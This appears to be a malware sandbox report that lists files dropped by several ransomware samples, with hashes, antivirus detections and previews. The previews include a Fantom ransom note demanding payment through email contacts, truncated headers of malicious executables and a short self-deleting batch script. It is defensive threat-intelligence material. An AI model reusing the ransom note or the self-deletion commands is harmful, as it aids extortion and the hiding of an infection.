                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):944
                                                                                                        Entropy (8bit):7.802699595805202
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:V3w3/cy3OfQvC8VbC3pkTjGlbyaWOfTl3IPm3v:p7wdSCjGkoYPm/
                                                                                                        MD5:EB441B69E5FB25D6BDB0CCE187BC0454
                                                                                                        SHA1:673A27531A8F13EDB87C01C8584CB3BB4C21D168
                                                                                                        SHA-256:B3E26C82784E62E2BEA0D05EA3983F7BBE3A373E76CE1399764D6C75D5CE94CE
                                                                                                        SHA-512:FD2EC5154F7C130C6D1CDEAD892B34D7EB411E3CE96521C40DD075C9B6EAA5F78F3C019B48AE8340341D02F1B4BC7E15486D91A1DEEDD96F3369DEE70DD26BC1
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:0i.|....7.....y."D.&?.......'...'.[2..{.E>4+.>....p..6fYt(..i..{g8Hj....yLY....eEy.....<.............`.v^.....-..X...iq...7....2..A..{4?p1o..IpX..7..}.*[.a.|'].gM..U2....d....>......o.T..C..3.D.Id...H.$..<Zt.l.......,......[...|.n...|.(L....}.]+./.o]y`....c.J...5o...}4.>.q..V.b..8.m..6Q...................G.j%d.....Oj..mvT.1s....R:1l!.NCG..4.u<.B..8j..q.8U4..e&..~c.D.@..2..*.&%.'.tOd....5.h.V.Z.......~1...<.&.x.P..U.x^.le....n....m.[.O|.n.N:..j.Y.[-A.gF....}R.f....u....!.....2....~e.....p..igGE.m.WC..D..S.~.c...O....c.b;.oer....%.O.,...(..".O..........Y.....q.C..........!..h..0.)...x...2..q...6h.....1.Y..eh..J+.........!w...7\...n.j&..4X....9...X.x./'pr.oX=.......Q.fo."-.v...0O....u$F.J.g..o!.......{P..?<u.as...."...ZJ\.z...q.i...'..k..2.%.).D.;.....<...M......!...9..m.._...f...Y...p......ep.B".:O.=M./..<...o..yQR.mb..E.G.\(..'.{I..%.,...x.....x..3I.Eyh.w..)..1.o..-...'...&u...;...
                                                                                                        Process:C:\Windows\dispci.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):57
                                                                                                        Entropy (8bit):2.062967662624547
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:/lEltfgnwT:yvT
                                                                                                        MD5:B5D2B9D74D52DAC47A3F3CB1D065305F
                                                                                                        SHA1:41A4742BC23F3A6FF61C60884604DA6448FFF274
                                                                                                        SHA-256:6359A4FCB0DABE70B88913A6A03CC21385459B8A924A6B3688A2E185C54DAAFA
                                                                                                        SHA-512:01EA77C5972D33494C10D6ADB47CB3F30EAC1AA4B93D6BAAFB75299AA99FED818A6275801BAAE92C18AC5D3C64443BB631A63C2B39B1B88BCD774218BB2B990F
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:........................................computer$.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):384
                                                                                                        Entropy (8bit):7.4758348808485575
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:6C3ot8qN+vXSLWtpIS8wh9NSS/spQNWyeqcg5nC3MDT72thPe1GTqwQG3Je8/EZ:p4tkjtpIhwhyS/s2NWkaSkhm1GTH3JDG
                                                                                                        MD5:6744E4D603C207835BF86CDAE7E71000
                                                                                                        SHA1:D9023B3CDA7356C1D305DB1C34CF34B6579FBB1C
                                                                                                        SHA-256:ABA3C4C0DEED1CE01688017B3873F0E7F9B114E963C9FE51D4D8C42AC76EF01D
                                                                                                        SHA-512:FC0E33B61E8AF7A0F7A81B06A7BCD2B67ACE2CF9885A4276DEE8DC040628FB1BDD975FB70E42C60328ECC40EE4DD39EA97837EF0A87AF935E46EE4D74283B0EE
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:fS.WOU...".....*.I.i......hqSA..B........hMlw.o7...u.u_.X.@.)....>9H....)..$J).K.U=.Q/.......V........P...e}..|..v;.U..'&.L.9...l...7..LP......].i.6[.. {..h2...R..)B@.Y.=N...6...,.u...jqMM...3;f...T..I..9...Zu.....+...!..6,.^...(|g.S..R...tH2E.f>...<.....P.RL..\I....O..D..R..t+.....i.*>..x.8...V.d.w...... ..7>......r.my..2M.).Xw...q.#.1&./?..iIP.4.3...m2.7...&F
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):6.978038932945227
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:S6e9ESxKFua8d2WctrKrMuAXv3VpzvYm/OMzbhO3vDDFCD/oqn8/zt9RjeDtvEQM:Sf5KFua8skaflBvYm2MzbhqLD9iuztXN
                                                                                                        MD5:3FFCC41680A97BEA4C5741DF07494A46
                                                                                                        SHA1:C30BA88151B8CAEB85C7AC961481BB9E1D0D860B
                                                                                                        SHA-256:FB27305DD14A3F9D4188AE4BF59C8A1961886EAA8267B4C0499DF8F7A18AC0D8
                                                                                                        SHA-512:71F2BFCFCD99C8B6201F36C323837F17AD880599EB0F3B804A8C30E5C80FA6619FAE389C333A15AC61663F5E29365D16687F857CAA59DC30D5843E5177AFE269
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:i......I.rq....@..B.o..`o......axu=..P%.......'.y..3tH.X^-S..|.16.. *..W..t~.r.3.o....n..}.-.U.>...i....Ty..@.U.Q0.........j.sU........&>.Z......Z. .5.....Y..k.......Fw.@]..o!...|.4..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):6.989630404243052
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:S6e9ESxKFua8d2WctrKrMuAXv3VpzvYm/O7JA5+dRyHiNT6H7v0cOHq7mCfcpYTD:Sf5KFua8skaflBvYm2NADikIcOKiL72
                                                                                                        MD5:FB70411A527394ECB464B30738BB1E54
                                                                                                        SHA1:78AC624445DEF4A21F775241B768067EC38BD4FE
                                                                                                        SHA-256:8D38FB1AAA60296E4797C20DD3AEC21437FA58B81BD43EF40233025C3372A384
                                                                                                        SHA-512:C262E74C2050DA92E599EEA9FF951ABF3B0E95314CB4BB07E6A80C70CC1E2B33CD0F2F966259DE167F7F2A8F9624ED7C886F1C8EAC9BEBE8EA3A7EFBE2A0BD13
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:i......I.rq....@..B.o..`o......axu=..P%.......'.y..3tH.X^-S..|.16.. *..W..t~.r.3.o....n..}.-.U.>...i....Ty..K.vR.....rU.9....]...zOy..(2."..L.....h.3[.u..z!.......t.,..."^C.5n6v....f..5.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):176
                                                                                                        Entropy (8bit):6.9521349566194415
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:6C3js1tDyFyHN+vXSLl4/pIQdyhZS+lHhUtz1c4uw97ac8yEEWS/skmZhifz0n:6C3ot8qN+vXSLWtpIS8wh9NSS/ssz0n
                                                                                                        MD5:89A8BD5FAE5B24BF30A379648860BA2A
                                                                                                        SHA1:5BBEDA0ADB8B34488E4BF8134D15F7A3750C26F0
                                                                                                        SHA-256:C747840172E684EAC2976B0E962647492BF2A26C62A0CCDACB3288144054959C
                                                                                                        SHA-512:09E6BCBE9384AD297DDE45361C6CA42DD87DE6E177970BAFDCEBAD6D666F76073EB4319F58F03D7C1605EF9FD66BB5BEE1F8C76761A554AE88CB41446B9E7765
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:fS.WOU...".....*.I.i......hqSA..B........hMlw.o7...u.u_.X.@.)....>9H....)..$J).K.U=.Q/.......V........P...e}..|..v;.U..'&.L.9...l...7..LP......].i.6[.C>..dq.....$..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):352
                                                                                                        Entropy (8bit):7.3802671129163375
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:6C3ot8qN+vXSLWtpIS8wh9NSS/s4D/NtkMFMhnaouwcMcfsti6XIwknb+8hWb0WB:p4tkjtpIhwhyS/s4TNtkNhnaohcMc0tl
                                                                                                        MD5:4FA719749B4DAD309D85D87A1E8364FD
                                                                                                        SHA1:A7D8DD56C4EEA82CD8413C1EAE3283326617847F
                                                                                                        SHA-256:97D00951D39EA6B44084B9E7F0D1B69AABD916CCB24CCDC7D483D5200ED7484D
                                                                                                        SHA-512:F5070393E3FBFDADF5FC150B9F80C43BEDEACD4FD2FE25E1216112587D04FBA29A70A3CE0A55464A0FBB2612699F3C059B72B84A032C8A0F989F2D90FEE05EEB
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:fS.WOU...".....*.I.i......hqSA..B........hMlw.o7...u.u_.X.@.)....>9H....)..$J).K.U=.Q/.......V........P...e}..|..v;.U..'&.L.9...l...7..LP......].i.6[.....)Q.4...i......b.&`g.......x.7.z..R(..ci....O.x..[ 2..L...o.=...FN....i.....2.....9..n/.....c;..=.A9.of..]..Q8..C.g.........2..=..|...~..2..6..D.....B..jF....#..V|....@..yi......
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1427968
                                                                                                        Entropy (8bit):6.856188310924527
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
                                                                                                        MD5:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                        SHA1:57EDD72391D710D71BEAD504D44389D0462CCEC9
                                                                                                        SHA-256:2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
                                                                                                        SHA-512:87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 91%
                                                                                                        • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..=...n...n...n5g.n...n...n...n..6n...n...n...n..!n...n..$n...nRich...n................PE..L...c@)Y.................P...v...... ........`....@..................................................................................`...............................................................................`...............................text....N.......P.................. ..`.rdata..|....`.......T..............@..@.data........P.......6..............@....rsrc....|...`.......<..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192512
                                                                                                        Entropy (8bit):7.777963354997896
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:B4Bsu61ekKqIqS5ICXfd9i8w8P5KtfilhwYaEU0QTe3Vqo22nUKtS:B4e3zTSriQKt6lujd0J3V/22UY
                                                                                                        MD5:D3481EFA5B26209A8299D0ED2A72FF2E
                                                                                                        SHA1:89FCF7CFBC732844127A8FB3E1B7E44097DB2563
                                                                                                        SHA-256:4DEAAAC356B2DE438633F85090471391F719DA19083254069B35A1EC613D572D
                                                                                                        SHA-512:B46953E24C8C955C96BBEAE2DEFEB8666D2953A5F4CB1C076E1C6B1D2D260A10B7D19AF28CA0A1ACDF47FFDD5347408D53EAA35EDC96B5AC6950266D4D33C850
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{.............................................@..................................................................................................................................................................................................text............................... ....................................................]A+...U..........}.... ..!.......h........L..,v..8.)..>....j.^.".%...x[...#.k.A..V'...C..1....T...L.k...e....?..bd.......C#.f..!....[..~,Z.?... 7LH.X. .b\.........$...ry..f.h..p.:..D]..h%...[e...9~...hB..N.o..T..J.6........#}.M..F...B.......-9.O-.1..;DpKq..iF[.P..Q'...qe........H._.+.X.0..gsO<..x..4.^............t....E3.X.....M..G|J.zXF.A.........0/ I$.H.yH..}^........r..:.....k....E*cj}..z.)..dAv.t.KI..yoCt.`.f3.2.k`CK....+C.....e....p.F.a..k....).
                                                                                                        Process:C:\ProgramData\sWAsokQQ\wKAwMsck.exe
                                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):2.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:pG:o
                                                                                                        MD5:6453C87468AE478A02D01480C75126B6
                                                                                                        SHA1:68CE859BCE61BFDF41FF50085FD2C07239B70DDE
                                                                                                        SHA-256:E9A3306E3843599EE3FCDFC0C66DB1F147306BC5EA8B852D0D0B9A1EEC828FB6
                                                                                                        SHA-512:6DBA8199D075DE07775CFEBD8306BE3B9F5E2CD9CE57E2F742BC0AE6F3DE90833B249F2DA9C7EAD424D9069B4505B0BA7E8FCAF9867D300EEB84E3261C1B4D12
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:x.5c
                                                                                                        Process:C:\Windows\dispci.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Thu Sep 29 11:45:06 2022, mtime=Thu Sep 29 11:45:21 2022, atime=Thu Sep 29 11:45:06 2022, length=142848, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):725
                                                                                                        Entropy (8bit):4.702354987986239
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:8i2h6Qm/aPl//EXor+VBlxfKX9jAoR6W+IWgL6CNbdbeubePILYum:8buu1br+HlxiX5Aol+IWt2bZecePyfm
                                                                                                        MD5:F70F2E2E9D68DD5DFE2E06FA67F1C93C
                                                                                                        SHA1:95E6B22E493DF74238935D15636F047E29783798
                                                                                                        SHA-256:F21EF0323DDA793C54B4208A789B8A8E90E18058037D538D865BF7A20F0064F2
                                                                                                        SHA-512:A34655A517A79FDC420C6D889DCBC626CE32FD217FA691C6C563102BBD8E66CEABEB8620C65E7217F7D24BE159A61E3411998E4D346F4020C9D06729CE2A0A4E
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:L..................F.... ......M.......V.......M.................................P.O. .:i.....+00.../C:\...................V.1.....=U.e..Windows.@......L..=U.e...........................d..W.i.n.d.o.w.s.....`.2.....=U.e .dispci.exe..F......=U.e=U.e....0M.....................g..d.i.s.p.c.i...e.x.e.......D...............-.......C........... ........C:\Windows\dispci.exe....D.E.C.R.Y.P.T.......\.....\.....\.W.i.n.d.o.w.s.\.d.i.s.p.c.i...e.x.e.........$..................C..B..g..(.#....`.......X.......051829...........!a..%.H.VZAj....+r.h............!a..%.H.VZAj....+r.h...................A...1SPS.XF.L8C....&.m.%................S.-.1.-.5.-.1.8.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1427968
                                                                                                        Entropy (8bit):6.856188310924527
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
                                                                                                        MD5:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                        SHA1:57EDD72391D710D71BEAD504D44389D0462CCEC9
                                                                                                        SHA-256:2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
                                                                                                        SHA-512:87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 91%
                                                                                                        • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..=...n...n...n5g.n...n...n...n..6n...n...n...n..!n...n..$n...nRich...n................PE..L...c@)Y.................P...v...... ........`....@..................................................................................`...............................................................................`...............................text....N.......P.................. ..`.rdata..|....`.......T..............@..@.data........P.......6..............@....rsrc....|...`.......<..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):199
                                                                                                        Entropy (8bit):4.760766841877438
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:SbdWwxXWJceOaEnXr87+QVe2vwR/EtbWCd8IJcYjQyn:bwxXW8JXr87HVBvwNib7jN
                                                                                                        MD5:FB24BCA6DA31D0E323BAD503DDDD33B4
                                                                                                        SHA1:94FAACA085D3A18141C2CDF06236FA0678F67CF2
                                                                                                        SHA-256:8527DC488178ADB3E38E2F1F919FB70300662E7120ACC17B00FF7AE44FFBB797
                                                                                                        SHA-512:0FFEC419B3182E2C088DC90AEB7D9A2B70D8EC9BC826A192255C220BBF818971744A2C2EB7070F36C766000C92B68730A55EEC8292FB494A4CACA8A81E1C3F0C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:# Tor state file last generated on 2022-09-29 14:45:35 local time..# Other times below are in UTC..# You *do not* need to edit this file.....TorVersion Tor 0.2.5.10..LastWritten 2022-09-29 12:45:35..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):199
                                                                                                        Entropy (8bit):4.760766841877438
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:SbdWwxXWJceOaEnXr87+QVe2vwR/EtbWCd8IJcYjQyn:bwxXW8JXr87HVBvwNib7jN
                                                                                                        MD5:FB24BCA6DA31D0E323BAD503DDDD33B4
                                                                                                        SHA1:94FAACA085D3A18141C2CDF06236FA0678F67CF2
                                                                                                        SHA-256:8527DC488178ADB3E38E2F1F919FB70300662E7120ACC17B00FF7AE44FFBB797
                                                                                                        SHA-512:0FFEC419B3182E2C088DC90AEB7D9A2B70D8EC9BC826A192255C220BBF818971744A2C2EB7070F36C766000C92B68730A55EEC8292FB494A4CACA8A81E1C3F0C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:# Tor state file last generated on 2022-09-29 14:45:35 local time..# Other times below are in UTC..# You *do not* need to edit this file.....TorVersion Tor 0.2.5.10..LastWritten 2022-09-29 12:45:35..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):112
                                                                                                        Entropy (8bit):4.768536250532167
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:jGknQngol9LL3BGc2moKY9LL32JCK0rSgK0/o+0K0+ov:6kqgAbBGdmoKWb/egXo+03
                                                                                                        MD5:BAE1095F340720D965898063FEDE1273
                                                                                                        SHA1:455D8A81818A7E82B1490C949B32FA7FF98D5210
                                                                                                        SHA-256:EE5E0A414167C2ACA961A616274767C4295659517A814D1428248BD53C6E829A
                                                                                                        SHA-512:4E73A24161114844D0E42C44C73205C4A57FA4169BD16C95FB7E9D6D5FCDF8BD01741541C77570556AC1F5EE260DA67A9041F40381B6C6E0601C9DE385BDC024
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:echo WScript.Sleep(50)>%TEMP%/file.vbs..cscript %TEMP%/file.vbs..del /F /Q file.js..del /F /Q %1..del /F /Q %0..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):2.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Ro:O
                                                                                                        MD5:07012E3B900DB1D1AFC62A9D752B890D
                                                                                                        SHA1:5D20C8CADF17726C81220B24DAF2742FADCA3803
                                                                                                        SHA-256:80FBE93BEF3B8C5AB491149A21A3CA0CDC6199335774D930956B9B7FDBBA13A1
                                                                                                        SHA-512:7EFE76EAD040735C93CF5DB68E6908194590D2E084706562BC3B5B7C6A732387E054D8899D595CC3150CBA02E129D9E8EEA42A075A48EA332AFDC35964C2FD74
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:NgsM
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):2.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:2S:1
                                                                                                        MD5:F9E133041CE042DF04F1CC5A14082E92
                                                                                                        SHA1:7F1F3EDEA7CE6F2CEC829DEE8528F89B4017E17F
                                                                                                        SHA-256:3BB19A3CB18F26B3D8274752A45767AAEE9108FE367E9A4F1FC5A461F4B0B207
                                                                                                        SHA-512:419A8387A36F75CCAC8C965C2095F80BBD8A32F8B0D6641AD8210A3A03287DB5F56FD5EABBFB5EA9419F2AD57C935B937557819209FF1EFEA0D99622623076FA
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:OkYw
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22016
                                                                                                        Entropy (8bit):6.659180163384805
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:F9+aLp4ojrenkfVyL9NulYyAwX0uokwqwA8Xb6Pk5tOIdZy+kA4nk5tOIdZy+kLQ:qmp5tQClYyAwwePk5t50nk5t5bl31
                                                                                                        MD5:FEC89E9D2784B4C015FED6F5AE558E08
                                                                                                        SHA1:581FD9FB59BD42FBE7BD065CF0E6FF6D4D0DABA2
                                                                                                        SHA-256:489F2546A4AD1E0E0147D1CA2FD8801785689F67FB850171CCBAA6306A152065
                                                                                                        SHA-512:E3BBF89CC0A955A2819455137E540952C55F417732A596EF314A46D5312B3BED644AC7595F75D3639EBC30E85F0F210DBA0EF5B013D1B83BAFD2C17A9D685A24
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 62%
                                                                                                        • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-.W.........."...0..L...........k... ........@.. ....................................@..................................k..O...................................Hj............................................... ............... ..H............text....K... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B.................k......H.......`$..............(9.. 1............................................(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....rG..p~....o....t....*.~....*..(....*Vs....(....t.........*6.(.....(....*.*^.ra..p(....o.....(....*..0..........s.......}......}.....{.......&...%.rq..p.%.(.....%.(.....%.(.....%.(.....%.(.....%.(.....%.(.....%..|....(.....%..r...p.%..(.....%..r...p.( ...o!...s"...% ....o#...%.......s$...o%...o&...*z.,..{....,..{....o'.....((...*..0..
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):54569
                                                                                                        Entropy (8bit):6.640114556707396
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:4yKoNLsn4Jp9ZvRInygrpMoZN+WtOl08jxBEHCDwBLpZTPCUvQK:j/sn4/OycxZN+MKxp8t9zQK
                                                                                                        MD5:87CCD6F4EC0E6B706D65550F90B0E3C7
                                                                                                        SHA1:213E6624BFF6064C016B9CDC15D5365823C01F5F
                                                                                                        SHA-256:E79F164CCC75A5D5C032B4C5A96D6AD7604FAFFB28AFE77BC29B9173FA3543E4
                                                                                                        SHA-512:A72403D462E2E2E181DBDABFCC02889F001387943571391BEFED491AAECBA830B0869BDD4D82BCA137BD4061BBBFB692871B1B4622C4A7D9F16792C60999C990
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                        • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.{.#q..#q..#q..@S?.!q...n...q...UU."q...UP."q..Rich#q..........................PE..L...X\q@.................L...........7.......`....@..................................:......................................db..........pG...........................................................................`..d............................text...(K.......L.................. ..`.rdata..|....`.......P..............@..@.data....3...p.......`..............@....rsrc...pG.......H...n..............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3514368
                                                                                                        Entropy (8bit):7.995470941164686
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                                                                        MD5:84C82835A5D21BBCF75A61706D8AB549
                                                                                                        SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                                                                        SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                                                                        SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
